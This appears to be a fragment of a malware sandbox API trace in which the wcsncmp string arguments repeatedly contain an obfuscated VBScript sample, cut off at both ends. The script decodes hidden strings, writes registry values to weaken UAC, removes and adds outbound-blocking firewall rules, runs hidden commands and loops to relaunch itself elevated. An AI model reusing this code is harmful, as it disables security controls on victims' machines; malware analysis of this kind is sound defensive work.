1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0222.967] wcsncmp (_String1="65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0222.967] wcsncmp (_String1="5)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0222.967] wcsncmp (_String1=")-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.967] wcsncmp (_String1="-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0222.967] wcsncmp (_String1="x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 